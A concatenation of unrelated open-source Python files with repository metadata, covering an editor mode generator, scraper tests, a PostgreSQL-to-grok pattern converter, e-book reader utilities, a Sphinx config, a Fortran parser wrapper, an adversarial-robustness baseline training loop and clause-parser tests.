if len(splitted) > 1 and splitted[0].strip() in keywords:
# Replace the keyword with the new value
#newlines += keywords[splitted[0]]
#del keywords[splitted[0]]
pass
else:
newlines += line
self.class_attrs = newattrs + "\n" + newlines
def replaceClassprefs(self, vals):
newprefs = vals['classprefs']
keywords = set()
for attrline in newprefs.splitlines():
keyword, value = attrline.split(",", 1)
keywords.add(keyword)
lines = self.classprefs.splitlines(True)
newlines = ""
# the default_classprefs should start it out
newprefs = lines[0] + newprefs
for line in lines[1:]:
splitted = line.split(",")
if len(splitted) > 1 and splitted[0] in keywords:
pass
else:
newlines += line
self.classprefs = newprefs + "\n" + newlines
def generatePluginFile(destdir, lang):
module_name = facade.getPeppyFileName(lang)
plugin_path = os.path.join(destdir, module_name + ".peppy-plugin")
conf = ConfigParser.ConfigParser()
conf.add_section("Core")
conf.set("Core", "Name", "%s Mode" % facade.getPeppyModeKeyword(lang))
conf.set("Core", "Module", module_name)
conf.add_section("Documentation")
conf.set("Documentation", "Author", "Rob McMullen")
conf.set("Documentation", "Version", "0.1")
conf.set("Documentation", "Website", "http://www.flipturn.org/peppy")
conf.set("Documentation", "Description", "Major mode for editing %s files" % facade.getPeppyModeKeyword(lang))
fh = open(plugin_path, "w")
conf.write(fh)
def processSampleText(filename):
#dprint("Processing sample text")
langs = facade.getAllEditraLanguages()
sample_text = {}
for lang in langs:
keyword = facade.getPeppyModeKeyword(lang)
sample_text[keyword] = facade.getEditraLanguageSampleText(lang)
import pprint
pp = pprint.PrettyPrinter()
fh = open(filename, "w")
fh.write("# Generated file containing the sample text for Editra modes\n")
fh.write("sample_text=")
fh.write(pp.pformat(sample_text))
fh.close()
def processStyleSpecs(filename):
#dprint("Processing style specs")
import pprint
pp = pprint.PrettyPrinter()
fh = open(filename, "w")
fh.write("# Generated file containing Editra style defaults for those major modes based\n# on Editra style files\n")
fh.write("\nstc_lexer_id=")
fh.write(pp.pformat(stc_lexer_id))
fh.write("\nsyntax_style_specs=")
fh.write(pp.pformat(syntax_style_specs))
fh.write("\nextra_properties=")
fh.write(pp.pformat(extra_properties))
if keywords_mapping:
fh.write("\nkeywords_mapping=")
fh.write(pp.pformat(keywords_mapping))
fh.write("\nunique_keywords=")
fh.write(pp.pformat(unique_keywords))
fh.write("\n")
fh.close()
if __name__ == "__main__":
usage="usage: %prog [-s dir] [-o file]"
parser=OptionParser(usage=usage)
parser.add_option("-o", action="store", dest="outputdir",
default="../peppy/major_modes", help="output directory")
parser.add_option("--sample-text", action="store", dest="sample_text_file",
default="../peppy/editra/sample_text.py", help="dict containing sample text for each editra language")
parser.add_option("--style-spec", action="store", dest="style_spec_file",
default="../peppy/editra/style_specs.py", help="dict containing sample text for each editra language")
(options, args) = parser.parse_args()
process(options.outputdir)
processSampleText(options.sample_text_file)
processStyleSpecs(options.style_spec_file)
license: gpl-2.0 | hash, line_mean, line_max, alpha_frac, autogenerated:
| -3,615,765,190,283,932,000 | 34.045576 | 124 | 0.617427 | false |
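The mode generator above boils down to %-formatting a large module template with a per-language vals dict built in getEditraInfo(). A minimal sketch of that substitution step, with made-up values:

template = '''class %(class_name)sMode(FundamentalMode):
    """Stub major mode for editing %(keyword)s files."""
    keyword = '%(keyword)s'
    editra_synonym = '%(lang)s'
'''
vals = {'class_name': 'Lua', 'keyword': 'Lua', 'lang': 'lua'}
print(template % vals)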
repo_name: crccheck/atx-bandc | path: bandc/apps/agenda/tests/test_utils.py | copies: 1 | size: 3059 | content:
import datetime
import os.path
from unittest import mock
from django.test import TestCase
from ..factories import BandCFactory
from ..utils import (
MeetingCancelled,
parse_date,
clean_text,
process_page,
get_number_of_pages,
_save_page,
)
from .. import scrape_logger
BASE_DIR = os.path.dirname(__file__)
class UtilsTests(TestCase):
def test_parse_date_works(self):
date = parse_date("January 13, 2014")
self.assertEqual(date, datetime.date(2014, 1, 13))
with self.assertRaises(MeetingCancelled):
date = parse_date("January 28, 2014 (Cancelled)")
def test_clean_test(self):
fixture = (
("", ""),
("test", "test"),
("- May 27, 2014 PARB Agenda", "May 27, 2014 PARB Agenda"),
)
for input, expected in fixture:
self.assertEqual(clean_text(input), expected)
def test_process_page_works(self):
html = open(os.path.join(BASE_DIR, "samples/music.html")).read()
meeting_data, doc_data = process_page(html)
self.assertEqual(len(doc_data), 9)
self.assertEqual(doc_data[0]["date"], datetime.date(2014, 6, 2))
def test_get_number_of_pages_works(self):
html = open(os.path.join(BASE_DIR, "samples/music.html")).read()
self.assertEqual(get_number_of_pages(html), 1)
html = open(os.path.join(BASE_DIR, "samples/parks.html")).read()
self.assertEqual(get_number_of_pages(html), 2)
@mock.patch("bandc.apps.agenda.models.Document.refresh")
def test_save_page_works(self, mock_task):
html = open(os.path.join(BASE_DIR, "samples/music.html")).read()
meeting_data, doc_data = process_page(html)
bandc = BandCFactory()
# Sanity check
self.assertEqual(bandc.latest_meeting, None)
process_next = _save_page(meeting_data, doc_data, bandc)
self.assertFalse(process_next)
self.assertEqual(bandc.latest_meeting.date.isoformat(), "2014-02-03")
self.assertEqual(bandc.latest_meeting.documents.all()[0].edims_id, 204789)
self.assertTrue(mock_task.called)
def test_save_page_handles_no_data(self):
meeting_data, doc_data = [], []
bandc = BandCFactory()
# Sanity check
self.assertEqual(bandc.latest_meeting, None)
process_next = _save_page(meeting_data, doc_data, bandc)
self.assertFalse(process_next)
self.assertEqual(bandc.latest_meeting, None)
@mock.patch("bandc.apps.agenda.models.Document.refresh")
def test_save_page_logs_to_scrape_logger(self, mock_task):
html = open(os.path.join(BASE_DIR, "samples/music.html")).read()
meeting_data, doc_data = process_page(html)
bandc = BandCFactory()
# Sanity check
self.assertEqual(bandc.latest_meeting, None)
with scrape_logger.init() as context:
_save_page(meeting_data, doc_data, bandc)
self.assertEqual(len(context.meetings), 4)
self.assertEqual(len(context.documents), 9)
license: bsd-3-clause | hash, line_mean, line_max, alpha_frac, autogenerated:
| -7,105,842,265,565,726,000 | 33.761364 | 82 | 0.632887 | false |
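The test module above pins down the behaviour of parse_date without showing its body. Purely as an illustration (this is not the project's implementation), a parse_date satisfying the first two assertions could look like this:

import datetime

class MeetingCancelled(Exception):
    pass

def parse_date(text):
    # A cancelled meeting is signalled by raising instead of returning a date.
    if 'Cancelled' in text:
        raise MeetingCancelled(text)
    return datetime.datetime.strptime(text, '%B %d, %Y').date()

assert parse_date('January 13, 2014') == datetime.date(2014, 1, 13)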
repo_name: habalux/pglog2grok | path: pglog2grok.py | copies: 1 | size: 4033 | content:
#!/usr/bin/env python
#
# Small script for generating a logstash grok filter and patterns for postgresql
# using a non-default log_line_prefix setting.
#
# Output of this script has NOT been tested in any production environment as of yet.
#
# Copyright (c) 2014, Teemu Haapoja <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
# Custom patterns
# PGLOG_TZ is a modified TZ pattern (original didn't recognize "EET" as valid)
pg_patterns = """
PGLOG_TZ (?:[PMCE][SDE]T|UTC)
PGLOG_APPLICATION_NAME .*?
PGLOG_USER_NAME .*?
PGLOG_DATABASE_NAME .*?
PGLOG_REMOTE_HOST_PORT (\[local\]|%{IP:host}\(%{POSINT:port}\))
PGLOG_REMOTE_HOST (\[local\]|%{IP:host})
PGLOG_PROCESS_ID %{POSINT}
PGLOG_TIMESTAMP %{TIMESTAMP_ISO8601} %{PGLOG_TZ:TZ}
PGLOG_COMMAND_TAG .*?
PGLOG_SQL_STATE .*?
PGLOG_SESSION_ID [0-9\.A-Fa-f]+
PGLOG_SESSION_LINE_NUMBER %{POSINT}
PGLOG_SESSION_START_TIMESTAMP %{PGLOG_TIMESTAMP}
PGLOG_VIRTUAL_TRANSACTION_ID ([\/0-9A-Fa-f]+)
PGLOG_TRANSACTION_ID ([0-9A-Fa-f])+
PGLOG_LOGLEVEL (DEBUG[1-5]|INFO|NOTICE|WARNING|ERROR|LOG|FATAL|PANIC|DETAIL)
PGLOG_MESSAGE .*
"""
def prefix_to_grok(pr):
replace_map = {
r'%a' : "%{PGLOG_APPLICATION_NAME:application_name}",
r'%u' : "%{PGLOG_USER_NAME:user_name}",
r'%d' : "%{PGLOG_DATABASE_NAME:database_name}",
r'%r' : "%{PGLOG_REMOTE_HOST_PORT:remote_host_port}",
r'%h' : "%{PGLOG_REMOTE_HOST:remote_host}",
r'%p' : "%{PGLOG_PROCESS_ID:process_id}",
r'%t' : "%{PGLOG_TIMESTAMP}",
r'%m' : "%{PGLOG_TIMESTAMP}",
r'%i' : "%{PGLOG_COMMAND_TAG:command_tag}",
r'%e' : "%{PGLOG_SQL_STATE:sql_state}",
r'%c' : "%{PGLOG_SESSION_ID:session_id}",
r'%l' : "%{PGLOG_SESSION_LINE_NUMBER:session_line_number}",
r'%s' : "%{PGLOG_SESSION_START_TIMESTAMP:session_start_timestamp}",
r'%v' : "%{PGLOG_VIRTUAL_TRANSACTION_ID:virtual_transaction_id}",
r'%x' : "%{PGLOG_TRANSACTION_ID:transaction_id}",
r'%q' : "",
}
pr = pr.replace(r'%%',r'%')
for k,v in replace_map.items():
pr = pr.replace(k,v)
return "%s%%{PGLOG_LOGLEVEL:loglevel}: %%{PGLOG_MESSAGE:message}"%(pr)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Create a grok pattern for your postgresql configuration")
parser.add_argument('-q','--quiet', help="Be quiet, only output the grok pattern", action='store_const', const=True)
parser.add_argument('-p', '--prefix', help="log_line_prefix from YOUR postgresql.conf", required=True)
args = parser.parse_args()
if args.quiet:
print prefix_to_grok(args.prefix)
else:
print "You need to add these patterns to your logstash patterns_dir: "
print "> ==== snip === <"
print pg_patterns
print "> ==== snip === <"
print ""
print "This is the filter for your log_line_prefix:\n\n%s"%(prefix_to_grok(args.prefix))
license: bsd-2-clause | hash, line_mean, line_max, alpha_frac, autogenerated:
| -7,059,104,021,549,284,000 | 38.539216 | 117 | 0.706422 | false |
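To sanity-check the converter above without logstash, prefix_to_grok can be called directly. The sketch below runs under Python 2 (the script itself uses print statements) and the log_line_prefix value is only an example:

from pglog2grok import prefix_to_grok

print(prefix_to_grok('%t [%p] user=%u db=%d '))
# -> %{PGLOG_TIMESTAMP} [%{PGLOG_PROCESS_ID:process_id}] user=%{PGLOG_USER_NAME:user_name} db=%{PGLOG_DATABASE_NAME:database_name} %{PGLOG_LOGLEVEL:loglevel}: %{PGLOG_MESSAGE:message}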
repo_name: rk700/rbook | path: rbook/utils.py | copies: 1 | size: 5438 | content:
#!/usr/bin/env python
#-*- coding: utf8 -*-
#
# Copyright (C) 2012 Ruikai Liu <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with rbook. If not, see <http://www.gnu.org/licenses/>.
import os
import wx
import wx.lib.newevent
import glob
def lines2dict(lines):
res = {}
for line in lines:
line = line.strip()
try:
inode, path, page, scale, posx, posy, show_outline = line.split('\t')
except ValueError:
continue
else:
res[int(inode)] = (path,
int(page),
float(scale),
(int(posx), int(posy)),
int(show_outline))
return res
def dict2lines(pages):
res = []
for inode, info in pages.items():
res.append('%s\t%s\t%s\t%s\t%s\t%s\t%s\n' % (str(inode),
info[0],
str(info[1]),
str(info[2]),
str(info[3][0]),
str(info[3][1]),
str(info[4])))
return res
def path_completions(s, currentdir=''):
if currentdir == '':
fullpath = os.path.abspath(os.path.expanduser(s))
else:
fullpath = os.path.normpath(os.path.join(currentdir,
os.path.expanduser(s)))
if os.path.isdir(fullpath):
fullpath = fullpath+'/'
res = glob.glob(fullpath+'*')
res.append(fullpath)
return res
def cmd_completions(s):
fullcmd = ['ic=', 'showoutline=', 'quitonlast=', 'storepages=', 'autochdir=']
res = [cmd for cmd in fullcmd if cmd.find(s)==0]
res.append(s)
return res
def init_dir():
configdir = os.path.expanduser('~/.rbook')
if not os.path.exists(configdir):
os.makedirs(configdir, 0755)
configfile = os.path.join(configdir, 'rbookrc')
fout = open(configfile, 'w')
lines = ['#ignore case when searching, default false\n',
'#ic=0\n',
'\n',
'#show outline if available, default true\n',
'#showoutline=1\n',
'\n',
'#quit rbook when closing the last tab, default true\n',
'#quitonlast=1\n',
'\n',
'#store page index for next time, default true\n',
'#storepages=1\n',
'\n',
'#automatically change the dir to the dir containing the current document\n',
'#autochdir=1\n']
fout.writelines(lines)
fout.close()
def init_settings():
settings = {'ic':0,
'showoutline': 1,
'quitonlast': 1,
'storepages': 1,
'autochdir': 1}
configfile = os.path.expanduser('~/.rbook/rbookrc')
if os.path.exists(configfile):
try:
f = open(configfile)
lines = f.readlines()
f.close()
except IOError:
lines = []
for line in lines:
text = line.strip().split('#')[0]
if not text == '':
try:
handle_new_setting(settings, text)
except ValueError as inst:
print(inst.args)
return settings
def init_page_dict():
pages = os.path.expanduser('~/.rbook/pages')
if not os.path.exists(pages):
f = open(pages, 'w')
win_info = (wx.DefaultPosition, wx.DefaultSize)
page_dict = {}
f.close()
else:
try:
f = open(pages)
line = f.readline()
try:
posx, posy, sizew, sizeh = line.split(' ')
win_info = (wx.Point(int(posx), int(posy)),
wx.Size(int(sizew), int(sizeh)))
except ValueError:
win_info = (wx.DefaultPosition, wx.DefaultSize)
lines = f.readlines()
f.close()
except IOError:
win_info = (wx.DefaultPosition, wx.DefaultSize)
lines = []
page_dict = lines2dict(lines)
return (win_info, page_dict)
def handle_new_setting(settings, text):
try:
key, value = text.split('=')
except ValueError:
raise ValueError('!Error: format should be key=value')
else:
try:
value = int(value)
if (not value == 0) and (not value == 1):
raise ValueError
except ValueError:
raise ValueError('!Error: value should be 1 or 0')
else:
if key in settings:
settings[key] = value
else:
raise ValueError('!Error: %s is not a valid key' % key)
license: gpl-3.0 | hash, line_mean, line_max, alpha_frac, autogenerated:
| 367,495,738,030,341,500 | 32.9875 | 95 | 0.500368 | false |
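The lines2dict and dict2lines helpers at the top of the file above are inverses, which is easy to check. The sketch assumes the module is importable as rbook.utils under Python 2 (it imports wx and uses a 0755 octal literal); the record values are invented:

from rbook.utils import lines2dict, dict2lines

lines = ['12345\t/home/user/book.pdf\t3\t1.5\t10\t20\t1\n']
pages = lines2dict(lines)
assert pages[12345] == ('/home/user/book.pdf', 3, 1.5, (10, 20), 1)
assert lines2dict(dict2lines(pages)) == pages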
repo_name: sixty-north/structurizr-python | path: docs/source/conf.py | copies: 1 | size: 5152 | content:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Structurizr Python documentation build configuration file, created by
# sphinx-quickstart on Mon Jun 5 16:42:42 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# on_rtd is whether we are on readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
sys.path.insert(0, os.path.abspath(os.path.join('..', '..')))
import structurizr
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'cartouche']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Structurizr Python'
copyright = '2017, Sixty North AS'
author = 'Sixty North AS'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = structurizr.__version__
# The full version, including alpha/beta/rc tags.
release = structurizr.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'StructurizrPythondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'StructurizrPython.tex', 'Structurizr Python Documentation',
'Sixty North AS', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'structurizrpython', 'Structurizr Python Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'StructurizrPython', 'Structurizr Python Documentation',
author, 'StructurizrPython', 'One line description of project.',
'Miscellaneous'),
]
license: apache-2.0 | hash, line_mean, line_max, alpha_frac, autogenerated:
| -4,845,932,692,731,908,000 | 29.666667 | 79 | 0.681289 | false |
repo_name: ScottWales/ftools | path: ftools/parser/parser.py | copies: 1 | size: 1296 | content:
#!/usr/bin/env python
"""
Copyright 2015 ARC Centre of Excellence for Climate Systems Science
author: Scott Wales <[email protected]>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from Fortran03Lexer import Fortran03Lexer
from Fortran03Parser import Fortran03Parser
from antlr4 import CommonTokenStream
def parse(stream):
"""
Parse a stream using antlr
Inputs:
- stream: an antlr4.FileStream (to parse a file) or antlr4.InputStream (to parse a
string)
Outputs:
- An Antlr parser object. Extract parse trees using functions with the
names of grammar products, e.g.
parse(InputStream('function foo(bar)')).functionStmt()
"""
lex = Fortran03Lexer(stream)
toks = CommonTokenStream(lex)
par = Fortran03Parser(toks)
return par
license: apache-2.0 | hash, line_mean, line_max, alpha_frac, autogenerated:
| -3,745,487,346,356,017,700 | 30.609756 | 87 | 0.738426 | false |
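Following its own docstring, the parse() helper above can be driven on a short string. This sketch assumes the ANTLR-generated Fortran03Lexer/Fortran03Parser modules are importable alongside it and that functionStmt is a rule of the grammar, as the docstring suggests:

from antlr4 import InputStream
from ftools.parser.parser import parse

par = parse(InputStream('function foo(bar)'))
tree = par.functionStmt()
print(tree.toStringTree(recog=par))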
repo_name: google-research/selfstudy-adversarial-robustness | path: training/train_baseline.py | copies: 1 | size: 8359 | content:
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Training code for baseline model."""
from absl import app
from absl import flags
from absl import logging
import os
import numpy as np
import tensorflow as tf
from tqdm import trange
import common.data as data
from common.networks import AllConvModel
import training.utils as utils
class TrainLoop:
def __init__(self, num_filters, num_classes, input_shape):
"""
Create the models to be trained, and set up the base variables.
"""
self.model, self.ema_model = self.make_ema_model(num_filters,
num_classes,
input_shape)
self.base_lr = 0.03
self.sgd_momentum = 0.9
self.save_checkpoint_epochs = 10
def make_model(self, num_filters, num_classes, input_shape):
"""
Make a model with the specified number of filters, classes, and shape
"""
model = AllConvModel(num_classes=num_classes,
num_filters=num_filters,
input_shape=input_shape)
# Remove softmax for training
model.layers = model.layers[:-1]
return model
def batch_predict(self, model, x, batch_size):
"""
Predict the neural network on a batch of examples
"""
preds = []
for i in range(0, len(x), batch_size):
preds.extend(tf.argmax(model(x[i:i+batch_size], training=False),axis=1).numpy())
return preds
def loss(self, model, x, y, return_preds=False, wd=1e-4):
"""
Compute the loss of the neural network on a given (x,y) tuple.
"""
logits = model(x, training=True)
l_xe = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits,
labels=y))
l_wd = tf.add_n([tf.nn.l2_loss(v) for v in model.trainable_variables if 'kernel' in v.name])
total_loss = l_xe + wd * l_wd
if return_preds:
return total_loss, logits
else:
return total_loss
def augment(self, x, y):
return data.augment_weak(x), y
@tf.function
def train_step(self, x, y):
"""
Run one iteration of gradient descent on the (x,y) tuple.
"""
with tf.GradientTape() as tape:
# Compute the loss on this set of examples
total_loss, logits = self.loss(self.model,
*self.augment(x, y),
return_preds=True)
# Get the gradient of the loss
g = tape.gradient(total_loss, self.model.trainable_variables)
self.optimizer.apply_gradients(zip(g, self.model.trainable_variables))
# Keep an exponential moving average of model weights to save
for ema_var, value in zip(self.ema_model.variables, self.model.variables):
ema_var.assign_sub((ema_var - value) * 0.001)
return tf.argmax(logits, axis=1), total_loss
def make_ema_model(self, num_filters, num_classes, input_shape):
"""
Create a model, and an EMA model.
Initialize the EMA model to the weights of the original model.
"""
model = self.make_model(num_filters, num_classes=num_classes, input_shape=input_shape)
ema_model = self.make_model(num_filters, num_classes=num_classes, input_shape=input_shape)
for ema_var, value in zip(ema_model.variables, model.variables):
ema_var.assign(value)
return model, ema_model
def post_epoch(self, epoch_frac, dataset):
"""
Method to run after every epoch of training.
By default just print the final test accuracy, but other defenses
might require other processing afterwards.
"""
_, (x_test, y_test), num_classes = dataset
test_acc = np.mean(self.batch_predict(self.ema_model, x_test, 64) == y_test)
print(' test accuracy: ', "%.3f" % test_acc)
def make_optimizer(self, steps_per_epoch, num_epochs):
lr_schedule = utils.DecayLearningRateSchedule(steps_per_epoch=steps_per_epoch,
base_lr=self.base_lr,
num_epochs=num_epochs)
return tf.keras.optimizers.SGD(learning_rate=lr_schedule, momentum=self.sgd_momentum)
def train(self, dataset, batch_size, num_epochs, model_dir):
"""
Actually train the network on the provided dataset, for the
        given number of epochs, and save it to model_dir.
"""
if os.path.exists(os.path.join(model_dir, 'final_checkpoint-1.index')):
print('Model already trained.')
return
(x_train, y_train), (x_test, y_test), num_classes = dataset
steps_per_epoch = (len(x_train) + batch_size - 1) // batch_size
self.optimizer = self.make_optimizer(steps_per_epoch, num_epochs)
checkpoint = utils.create_or_load_checkpoint(model_dir=model_dir,
model=self.model,
ema_model=self.ema_model,
opt=self.optimizer)
print("Total number of training epochs:", num_epochs)
# Compute initial_epoch in case model is restored from checkpoint
initial_epoch = self.optimizer.iterations.numpy() // steps_per_epoch
for epoch in range(initial_epoch, num_epochs):
print('Training epoch ', epoch)
order = np.random.permutation(len(x_train))
# Run training, saving the model loss and accuracy each minibatch
avg_loss = []
avg_acc = []
for i in trange(0, len(order), batch_size, leave=False, unit='img', unit_scale=batch_size):
xb = x_train[order[i:i+batch_size]]
yb = y_train[order[i:i+batch_size]]
batch_preds, batch_loss = self.train_step(xb, yb)
if np.isnan(batch_loss):
print("Training diverged. Loss goes to nan.")
print("Last 30 loss values:", avg_loss[-30:])
exit(1)
avg_loss.append(batch_loss)
avg_acc.append(np.mean(batch_preds == yb))
print("Avg train loss: %.3f" % np.mean(avg_loss),
' avg train accuracy:', "%.3f" % np.mean(avg_acc),
end="")
self.post_epoch(epoch/num_epochs, dataset)
if epoch % self.save_checkpoint_epochs == 0:
checkpoint_name = checkpoint.save(
os.path.join(model_dir, 'checkpoint'))
logging.info('Saved checkpoint to %s', checkpoint_name)
print()
# Final checkpoint only includes EMA model
final_checkpoint = tf.train.Checkpoint(model=self.ema_model)
checkpoint_name = final_checkpoint.save(
os.path.join(model_dir, 'final_checkpoint'))
logging.info('Saved final checkpoint to %s', checkpoint_name)
FLAGS = flags.FLAGS
def main(argv):
del argv
dataset = data.load_dataset(FLAGS.dataset)
(x_train, y_train), (x_test, y_test), num_classes = dataset
input_shape = x_train[0].shape
loop = TrainLoop(FLAGS.num_filters,
num_classes, input_shape)
loop.train(dataset=dataset,
batch_size=FLAGS.batch_size,
num_epochs=FLAGS.num_epochs,
model_dir=os.path.join(FLAGS.model_dir, "baseline/"))
if __name__ == '__main__':
logging.set_verbosity(logging.INFO)
app.run(main)
|
apache-2.0
| -7,468,982,268,953,867,000 | 38.616114 | 103 | 0.573872 | false |
uclmr/inferbeddings
|
tests/inferbeddings/parse/test_parsers.py
|
1
|
2806
|
# -*- coding: utf-8 -*-
import pytest
import inferbeddings.parse.clauses as clauses
@pytest.mark.light
def test_parse_clauses_one():
clause_str = 'p(x, y) :- p(x, z), q(z, a), r(a, y)'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert isinstance(clause, clauses.Clause)
assert isinstance(clause.head, clauses.Atom)
assert isinstance(clause.body, tuple)
assert isinstance(clause.head.predicate, clauses.Predicate)
assert isinstance(clause.head.arguments, tuple)
assert isinstance(clause.head.negated, bool)
assert clause.weight == 1.0
@pytest.mark.light
def test_parse_atom_clause():
clause_str = 'p(X, y)'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert isinstance(clause, clauses.Clause)
assert isinstance(clause.head, clauses.Atom)
assert len(clause.body) == 0
assert clause.head.predicate.name == "p"
assert isinstance(clause.head.arguments[0], clauses.Variable)
assert isinstance(clause.head.arguments[1], clauses.Constant)
assert clause.head.arguments[1].name == "y"
assert clause.weight == 1.0
@pytest.mark.light
def test_parse_weighted_atom_clause():
clause_str = 'p(X, y) < -1.2 >'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert clause.weight == -1.2
@pytest.mark.light
def test_parse_weighted_arity_2_clause():
clause_str = 'p(X, y) :- r(X,Z), q(X) < 1.2 >'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert clause.weight == 1.2
@pytest.mark.light
def test_parse_learnable_weight_arity_2_clause():
clause_str = 'p(X, y) :- r(X,Z), q(X) < ? >'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert clause.weight is None
@pytest.mark.light
def test_parse_learnable_weight_atom_clause():
clause_str = 'p(X, y) < ? >'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert clause.weight is None
@pytest.mark.light
def test_parse_clauses_two():
clause_str = '"P"(x, y) :- p(x, z), q(z, a), "R"(a, y)'
parsed = clauses.grammar.parse(clause_str)
clause = clauses.ClauseVisitor().visit(parsed)
assert isinstance(clause, clauses.Clause)
assert isinstance(clause.head, clauses.Atom)
assert isinstance(clause.head.predicate.name, str)
assert isinstance(clause.body, tuple)
assert isinstance(clause.head.predicate, clauses.Predicate)
assert isinstance(clause.head.arguments, tuple)
assert isinstance(clause.head.negated, bool)
assert clause.weight == 1.0
if __name__ == '__main__':
pytest.main([__file__])
|
mit
| 4,395,747,292,373,985,000 | 28.229167 | 65 | 0.682466 | false |
cscorley/mud2014-modeling-changeset-topics
